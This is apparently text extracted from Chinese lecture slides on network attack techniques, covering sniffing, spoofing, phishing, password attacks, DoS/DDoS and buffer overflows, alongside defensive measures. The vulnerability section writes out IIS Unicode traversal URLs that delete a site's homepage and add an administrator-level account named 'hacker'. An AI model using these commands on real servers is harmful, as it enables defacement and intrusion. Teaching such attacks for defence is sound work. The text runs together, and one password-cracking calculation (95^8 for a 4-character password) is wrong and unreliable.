安全與支付第4講網絡攻擊技術網絡攻擊技術主要內容網絡監聽攻擊口令攻擊掃描攻擊欺騙攻擊漏洞利用攻擊拒絕服務攻擊監聽攻擊網絡監聽網絡監聽指的是利用計算機的網絡接口捕獲網絡上傳輸的目的地址為其它計算機的數據報文。網絡監聽工具也常稱作嗅探器，Snifferpro就是一個功能完善的網絡監聽工具監聽攻擊就是利用嗅探器來收集網絡上傳輸的敏感信息正在傳輸的用戶名或信用卡號、密碼各種非共享機密數據通信主機的接口地址、TCP連接的字節順序號碼以太網監聽原理在以太網局域網中一臺計算機與其他計算機進行數據交換的時候，本局域網中的所有計算機都會收到數據包，但只有與數據包中目標地址一致的那臺主機才會接收和處理數據包，其它的機器都會將包丟棄。但是，當主機工作在監聽模式下時，無論接收到的數據包中目標地址是什么，主機都將其接收下來。然后對數據包進行分析，就得到了局域網中通信的數據。嗅探器（Sniffer）就是將網卡設置為混雜模式，目的是使網絡接口處于監聽狀態，從而可接收網絡上傳輸的每一個數據包。網絡監聽常用Sniffer工具除了非常著名的監聽軟件SnifferPro外，還有一些常用的監聽軟件：Unix、Linux：Sniffit、TcpdumpWindows系統:Iris、NetworkMonitor

免費Ethereal：密碼監聽工具WinSniffer：監聽局域網內密碼

pswmonitor：監聽Web郵箱密碼、POP3郵箱密碼、Ftp登錄密碼等8如何發現和防范sniffer網絡通訊掉包率反常的高。網絡帶寬將出現異常。對于懷疑運行監聽程序的主機，用正確的IP地址和錯誤的物理地址去PING，正常的機器不接受錯誤的物理地址，處于監聽狀態的機器能接受，這種方法依賴系統的IPSTACK，對有些系統可能行不通。往網上發大量包含著不存在的物理地址的包,由于監聽程序將處理這些包，將導致性能下降，通過比較前后該機器性能（icmpechodelay等方法）加以判斷9如何發現和防范sniffer2．對網絡監聽的防范措施從邏輯或物理上對網絡分段

其目的是將非法用戶與敏感的網絡資源相互隔離，從而防止可能的非法監聽。

以交換式集線器代替共享式集線器，使單播包僅在兩個節點之間傳送，從而防止非法監聽。（3）使用加密技術

數據經過加密后，通過監聽仍然可以得到傳送的信息,但顯示的是亂碼。（4）劃分VLAN

運用VLAN（虛擬局域網）技術，將以太網通信變為點到點通信，可以防止大部分基于網絡監聽的入侵。

欺騙攻擊IP欺騙偽造他人的源IP地址，利用正常信任關系發動的攻擊ARP欺騙偽造IP地址和MAC地址的對應關系DNS欺騙讓DNS服務器的緩存中存在錯誤的IP地址映射Web欺騙（釣魚攻擊）假冒的web站點，騙取用戶的機密信息如04年10月發生的“網絡銀行”欺詐(網絡釣魚攻擊)IP欺騙攻擊IP欺騙攻擊13IP欺騙的防止（1）拋棄基于地址的信任策略（2）進行包過濾（3）使用加密方法（4）使用隨機化的初始序列號DNS欺騙攻擊DNS欺騙攻擊DNS特性DNS對其本身無法解析的域名會自動向其他DNS服務器查詢為提高效率DNS會將查詢結果存入緩存DNS欺騙的基本思路讓DNS服務器的緩存中存有錯誤的IP地址映射攻擊者要做兩件事：偽造一個用戶的DNS請求偽造一個查詢應答DNS欺騙攻擊網絡釣魚攻擊網絡釣魚(Phishing)一詞，是“Fishing”和“Phone”的綜合體，由于黑客始祖起初是以電話作案，所以用“Ph”來取代“F”，創造了”Phishing”攻擊者利用欺騙性的電子郵件和偽造的Web站點來進行詐騙活動，誘騙訪問者提供一些個人信息，如信用卡號、賬戶和口令、社保編號等內容（通常主要是那些和財務，賬號有關的信息，以獲取不正當利益），受騙者往往會泄露自己的機密數據網絡釣魚攻擊釣魚者入侵初級服務器，竊取用戶的名字和郵件地址釣魚者發送有針對性質的郵件受害用戶訪問假冒網站受害用戶提供秘密，用戶信息被釣魚者取得釣魚者使用受害用戶的身份進入其他網絡服務器如04年10月發生的“網絡銀行”欺詐(網絡釣魚攻擊)工行：—中國：—漏洞攻擊利用已發現的系統或應用軟件實現上的漏洞攻擊系統操作系統或應用軟件不可避免存在漏洞Windows3.1—300萬行代碼Windows2000—5000萬行代碼通過及時為系統安裝補丁程序，就可以消除系統漏洞。只要是針對漏洞進行攻擊的案例都依賴于系統是否打了相關的補丁。漏洞攻擊實例：微軟IIS服務器的Unicode漏洞攻擊：

Unicode漏洞是2000-10-17發布的，受影響的版本：MicrosoftIIS5.0+MicrosoftWindows2000系列版本MicrosoftIIS4.0+MicrosoftWindowsNT4.0

消除該漏洞的方式是安裝操作系統的補丁，只要安裝了SP1以后，該漏洞就不存在了。微軟IIS4.0和5.0都存在利用擴展UNICODE字符取代“/”和“\”，而能利用"../"目錄遍歷的漏洞漏洞攻擊Unicode漏洞的檢測方法：使用掃描工具來檢測Unicode漏洞是否存在，用前面介紹的X-Scan來對目標系統進行掃描，目標主機IP為：09，Unicode漏洞屬于IIS漏洞，所以這里只掃描IIS漏洞就可以只要是/scripts開頭的漏洞都是Unicode漏洞。如下面的掃描結果，就顯示此服務器有Unicode漏洞/script/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\(HTTP:200)漏洞攻擊漏洞攻擊其中/scripts目錄是IIS提供的可以執行命令的一個有執行程序權限的一個目錄，scripts目錄一般系統盤根目錄下的Inetpub目錄下，C:\Inetput\ScriptC:\Inetput\wwwroot在Windows的目錄結構中，可以使用兩個點和一個斜線“../”來訪問上一級目錄，在瀏覽器中利用“scripts/../../”可以訪問到系統盤根目錄，訪問“scripts/../../winnt/system32”就訪問到系統的系統目錄了，在system32目錄下包含許多重要的系統文件，比如cmd.exe文件，可以利用該文件新建用戶，刪除文件等操作。漏洞攻擊瀏覽器地址欄中禁用符號“../”，但是可以使用符號“/”的Unicode的編碼。比如“/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Unicode編碼。這條語句是執行dir命令列出目錄結構。利用該漏洞讀取出計算機上目錄列表，比如讀取C盤的目錄，只要在瀏覽器中輸入“09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\”得到如下結果：漏洞攻擊漏洞攻擊利用Unicode漏洞刪除主頁：利用Unicode可以方便的更改對方的主頁，比如現在已經知道對方網站的根路徑在“C:\Initpub\wwwroot”（系統默認）下，可以刪除該路徑下的文件“default.asp”來刪除主頁，這里“default.asp”文件是IIS的默認啟動頁面使用的語句是：09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+del+c:\inetpub\wwwroot\default.asp漏洞攻擊利用Unicode漏洞拷貝文件：為了是使用方便，利用語句將cmd.exe文件拷貝到scripts目錄，并改名為c.exe，使用的語句是：09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+c.exe程序執行結果如圖所示。漏洞攻擊利用Unicode漏洞入侵系統：在瀏覽器地址欄上執行命令，用戶的權限比較低，像net等系統管理指令不能執行。利用Unicode漏洞在對方系統建立管理員賬號可以通過下面一系列操作在對方主機創建一個有管理員權限的用戶36/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+echo+net+user+hacker+1234+/add+>c:\inetpub\scripts\hack.bat36/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+echo+net+user+hacker+/active:yes+>>c:\inetpub\scripts\hack.bat漏洞攻擊然后通過以下方式運行hack.bat文件

36/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\hack.bat

選擇打開，通過以上4步則在服務器上添加了一個管理員權限用戶hacker，密碼是1234口令攻擊口令攻擊是指把口令破解出來、獲取口令、或者讓口令保護失效。主要技術：字典攻擊暴力攻擊其它方法嗅探分析木馬竊取社交欺騙口令攻擊字典攻擊攻擊者基于某些知識構造口令字符串，生成口令字典，然后利用字典里的這些可能的字符串來測試密碼目的是縮小嘗試的范圍，高效快速的得到系統的密碼。一個字典文件本身就是一個標準的文本文件，其中的每一行就代表一個可能的密碼。口令攻擊口令字典的構造方法口令攻擊暴力攻擊：通過窮舉的方法，使用所有可能口令的字符組合逐一測試，也稱窮舉攻擊。比如先從字母a嘗試，嘗試aa、ab、ac…然后再嘗試aaa、aab、aac…實例：利用軟件GetNTUser破解密碼，如圖：口令攻擊口令攻擊口令攻擊軟件口令攻擊口令攻擊軟件37設置安全的口令

在一個安全的口令里應該包含大小寫字母、數字、標點、空格、控制符等，另外口令越長，攻擊的難度越大。假設每秒鐘測試一百萬次，用小寫字母組成的4字符口令，窮舉攻擊需要的最大次數為26^4，窮舉搜索僅需要0.5秒；由所有可輸入字符構成的4字符口令，則需要95^8次窮舉，搜索需要的時間為1.4分鐘，而8字符口令，則要95^8次窮舉，搜索需要的時間為210年。隨著硬件速度的不斷提高以及互聯網強大的分布計算能力，口令很難真正抵抗住窮舉攻擊的威脅。許多人設置口令時喜歡使用生日、名字、電話號碼、身份證號碼、地名、常用單詞等，這樣的口令固然便于記憶，但安全性極差。字典攻擊對于這樣的弱口令很奏效。38設置安全的口令口令的選擇：字母數字及標點的組合，如：Ha,Pp@y!和w/(X,y)*;使用一句話的開頭字母做口令，如：由Afoxjumpsoveralazydog!產生口令AfJoAld!。口令的保存：記住、放到安全的地方，加密最好。口令的使用：輸入口令不要讓別人看到；不要在不同的系統上使用同一口令；定期改變口令。39一次性口令（OTP，One-TimePassword）。一個口令僅使用一次，能有效地抵制重放攻擊OTP的主要思路是：在登錄過程中加入不確定因素，使每次登錄過程中的生成的口令不相同。口令列表，每次登錄使用完一個口令后就將它從列表明中刪除；用戶也可以使用IC卡或其他的硬件卡來存儲用戶的秘密信息，這些信息再隨機數、系統時間等參數一起通過散列得到一個一次性口令。拒絕服務攻擊DoS--DenialofService：凡是能導致合法用戶不能夠訪問正常網絡服務的行為都是“拒絕服務攻擊”。DoS最主要的目的是：造成被攻擊服務器資源耗盡或系統崩潰而無法提供服務。服務本身無傷害；可使提供服務的信任度下降，影響公司的聲譽以及用戶對網絡服務的使用。常見的DoS攻擊：①帶寬攻擊：以極大的通信量沖擊網絡，使網絡所有可用的帶寬都被消耗掉。②連通性攻擊：用大量的連接請求沖擊計算機，最終導致計算機無法響應和處理合法用戶的請求。單一的DoS攻擊一般是采用一對一的方式，當攻擊的計算機CPU速度低、內存小或網絡帶寬小等各項性能指標不高時，效果是明顯的。DoS攻擊的分類以消耗目標主機的可用資源為目的（例如：死亡之ping、SYN攻擊、Land攻擊、淚珠攻擊等）以消耗服務器鏈路的有效帶寬為目的（例如：蠕蟲）攻擊者

目標主機SYNSYN/ACKACK等待應答SYN：同步SYN/ACK:同步/確認ACK：確認SYN攻擊的原理（1）....SYN/ACKSYN/ACKSYN/ACKSYNSYNSYN攻擊者目標主機SYNSYN/ACK1nSYN/ACKSYN/ACKSYN/ACKSYN/ACK....等待ACK應答.........不應答不應答重新發送SYN攻擊的原理（2）以Windows為例SYN攻擊花費時間（秒）累計花費時間（秒）第一次，失敗33嘗試第1次，失敗69嘗試第2次，失敗1221嘗試第3次，失敗2445嘗試第4次，失敗4893嘗試第5次，失敗96189死亡之pingSYNFloodLand攻擊淚珠（Teardrop）攻擊

行行色色的DoS攻擊1)攻擊者攻擊諸客戶主機以求分析他們的安全水平和脆弱性。攻擊者各種客戶主機目標系統2)攻擊者進入其已經發現的最弱的客戶主機之內(“肉雞”)，并且秘密地安置一個其可遠程控制的代理程序(端口監督程序demon)。攻擊準備：安置代理代理程序DDoS(分布式拒絕服務)攻擊（1）

3)攻擊者使他的全部代理程序同時發送由殘缺的數字包構成的連接請求送至目標系統。攻擊者目標系統發起攻擊：指令攻擊的代理程序4)包括虛假的連接請求在內的大量殘缺的數字包攻擊目標系統，最終將導致它因通信淤塞而崩潰。虛假的連接請求DDoS(分布式拒絕服務)攻擊（2）DDoS和DoS小結DDoS的攻擊策略側重于通過很多“僵尸主機”（被攻擊者入侵過或可間接利用的主機）向受害主機發送大量看似合法的網絡包，從而造成網絡阻塞或服務器資源耗盡而導致拒絕服務，分布式拒絕服務攻擊一旦被實施，攻擊網絡包就會猶如洪水般涌向受害主機，從而把合法用戶的網絡包淹沒，導致合法用戶無法正常訪問服務器的網絡資源，因此，拒絕服務攻擊又被稱之為“洪水式攻擊”，常見的DDoS攻擊手段有SYNFlood、ACKFlood、UDPFlood、ICMPFlood、TCPFlood、ConnectionsFlood、ScriptFlood、ProxyFlood等；DoS則側重于通過對主機特定漏洞的利用攻擊導致網絡棧失效、系統崩潰、主機死機而無法提供正常的網絡服務功能，從而造成拒絕服務，常見的DoS攻擊手段有TearDrop、Land、Jolt、IGMPNuker、Boink、Smurf、Bonk、OOB等。緩沖區溢出（bufferoverflow)攻擊從一個對話框說起……認識緩沖區溢出【引例】把1升的水注入容量為0.5升的容量中……第一次大規模的緩沖區溢出攻擊是發生在1988年的Morris蠕蟲，它造成了6000多臺機器被癱瘓，損失在$100000至$10000000之間，利用的攻擊方法之一就是fingerd的緩沖區溢出。緩沖區溢出攻擊已經占了網絡攻擊的絕大多數，據統計，大約80%的安全事件與緩沖區溢出攻擊有關。流行的緩沖區溢出攻擊病毒(1)沖擊波

利用漏洞：RPC緩沖區溢出135/TCP(2)震蕩波

利用漏洞：LSASS漏洞1025/TCP(3)極速波

利用漏洞：UPNP漏洞445/TCP(4)高波

利用多種漏洞,非常危險惡意代碼攻擊病毒寄生、感染、